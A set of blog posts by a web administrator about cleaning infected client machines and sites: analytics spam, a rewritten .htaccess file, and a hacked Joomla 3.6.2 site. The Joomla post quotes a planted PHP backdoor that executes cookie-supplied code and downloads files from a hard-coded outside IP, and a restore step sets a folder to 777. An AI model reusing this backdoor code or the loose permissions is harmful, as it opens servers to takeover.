Remove wer5.exe With Adlice Rouge Killer

We have a customer that is having this “wer5.exe” pop-up. I never saw the pop-up; however, I was able to get the program removed using Adlice’s Rougekiller.

I tried Vipre antivirus and it didn’t find anything on the machine.

I used Malwarebytes which found 5 item.

Rougekiller found 12 items and “wer5.exe” was one of them.

I hope this helps someone else out there…

 

 

Google Anayltics Spam – Secret.ɢoogle.com You are invited! Enter only with this ticket URL. Copy it. Vote for Trump!

At first I thought I was going to get a bunch of photography business when I saw I got 149 visits in the past month to my photography website. I went to analyze the traffic and saw the following in the language section of my dashboard.

language_vote_trump

I looked at GEO location, and saw this.

language_vote_trump_map

Here are the channels for the month.

language_vote_trump_organic

Interesting part was there were 0 queries for the month.

Wierd, but I think diffinely a Russian attack on my site leading to bad usage of my website.

I hope this entertained someone else out there…

Comment if you had the same thing happen to your site.

 

 

 

Google Getting Tough On Malware Or Web Masters

I came across this article about Google getting tough on Malware. Starts out talking about Google putting out warning messages to user that the site has malware. Forcing webmasters to clean it up.

Though this puts pressure on Webmasters to not have  a “set it and forget it” attitude about the website. The article goes on to say the Google isn’t out to punish 3-Party plugin developers and site owners of legitimate sites. They are really targeting the serious offenders of just bad sites pushing out Malware.

http://www.newsfactor.com/story.xhtml?story_id=0320013QVEO0

I hope this helps someone else out there…

 

How To Fix Attacked .htaccess File On Godaddy Shared Hosting

Got a call from a client about website not coming up. If you searched for the site in a search engine and clicked on any link to the site you got a page about a missing PHP file.  This site is a static HTML site.

I opened the .htaccess file and saw redirects to the PHP file that didn’t exist. I cleared out the .htaccess file and when you click on the search link the site came up fine.

I contacted Godaddy looking for help, but they don’t deal with .htaccess files. You are on your own. They do offer SiteLock to protect the site.

I used the following links advice and to change the name of the .htaccess file and the contents of the file rewrite the name back to all lower case.

https://perishablepress.com/improve-site-security-by-protecting-htaccess-files/

My final .htaccess file containted the following

<Files ~"^.*\.([Hh][Tt][Aa])">
order allow,deny 
deny from all 
satisfy all 
</Files>

In addition, i changed the password for the FTP access. Next step is to use Sucuri. I know they can protect this site.

I hope this helps me and helps someone else out there…

 

Help Sucuri Clean Sites

Sucuri Antivirus is a great service. I found an attack on a Joomla 3.5 site where a PayPal form and zip file were inserted into the images folder.

There were the following clues to the attack:

  • PHP & INI files in the images directory
  • New folders called “bt”, “BT”, and “mic” in the images directory.

I contacted Sucuri to see if they wanted my findings and they have an email address to accept this kind of information …. labs@sucuri.net

I hope this helps someone else out there…

 

Joomla Security Check Extension – trying this one out

Got an email from Joomshine about security. I have had a couple of Joomla sites get attacked, and really want not have to deal with lack of faith that the site is attacker proof.

I downloaded this plugin “Securitycheck”, and I am going to take it for a test run. I will let you know how it goes.  Here is the link.

https://extensions.joomla.org/extension/securitycheck

I hope this helps someone else out there…

 

Google Analytics – Joomla 3.6.2 – frequent queries

Looking at a customers analytics I see the following a lot.

“please enter the email address for your account. a verification code will be sent to you. once you have received the verification code, you will be able to choose a new password for your account.”

This is when you need to recover your password.

This text is located in “language/en-GB/en-GB.com_users.ini”.  I used Notepad++ to easy edit this text in hoping it will change the results.

I hope this helps someone else out there…

 

 

Hacked Joomla 3.6.2 site – cms brute rmf 3.0.zip file found in Godaddy hosting.

Had a recent Joomla 3.6.2 install go blank. Site was fine one day and the next it was unreachable.

I FTP’ed into the site and I see WordPress folders in there and other strange files. There was a zip file called “cms brute rmf 3.0.zip”. Thre were odd PHP files such a “ebb6bff35a.php”. Look like an attack for sure. The PHP file was extremely complex.

The file “ebb6bff35a.php” starts out by grabbing the id set in a cookie for “user id” then points back the following ip with the cookie information. This IP stems from Belize.

if (isset($_COOKIE[“id”])) @$_COOKIE[“user”]($_COOKIE[“id”]);

if( isset($_REQUEST[“test_url”]) ){

echo “file test okay”; }

$f =$_GET[“d”];

$id=$f;

$current = file_get_contents(“http://80.87.205.79/$f”);

file_put_contents($id, $current);

if (!defined(‘PCLZIP_READ_BLOCK_SIZE’)) {

define( ‘PCLZIP_READ_BLOCK_SIZE’, 2048 );

}

files_in_joomla_install

Hopefully I can figure out what happen, but I am worried about security for sure.

 

After contacting Godaddy it looks like a complete attack. Uploaded PHP files, directories were created, and I didn’t get to check the database. Had to do a GoDaddy account reset and restore from an Akeeba backup.

The backup didn’t go well I got the following error.

akeeba_ajax_error

I followed the instructions on this page.

https://www.akeebabackup.com/documentation/troubleshooter/kscantextract.html

I had to create the “kicktemp” folder. Set the permissions to 777.  Set the type of install to FTP. For the root directory I had to use “/”.  Make sure to test the FTP connection.

The Kickstart restore took about 25 minutes to restore.

Here are the specs on the site.

  • Joomla 3.6.2
  • JCE
  • Akeeba
  • Chronoforms
  • JO Facebook Events Pro
  • Hot Themes Hot Fitness template.

One of the worst parts of this whole debacle is their SEO. The site was live for a month before the attack and the analytics were clicking along nicely. The site was getting around 300 plus hits a in the first month with around 100 key word matches.

During the attack the number of key word matches jumped to 16,000 matches and incredibility junky results.

analytics

This is a running store and have nothing to do with “sexy turkey”.  This all happened in just a few days. I really hope this doesn’t offend Google and they decide to block the site.

I hope this helps someone else out there…

 

Follow up:

A month later after this attack I looked at all of the directories and found no trace of another attack.

I am getting this in my Google Analytics reports.

please enter the email address for your account. a verification code will be sent to you. once you have received the verification code, you will be able to choose a new password for your account.

Does anyone know what to do about this?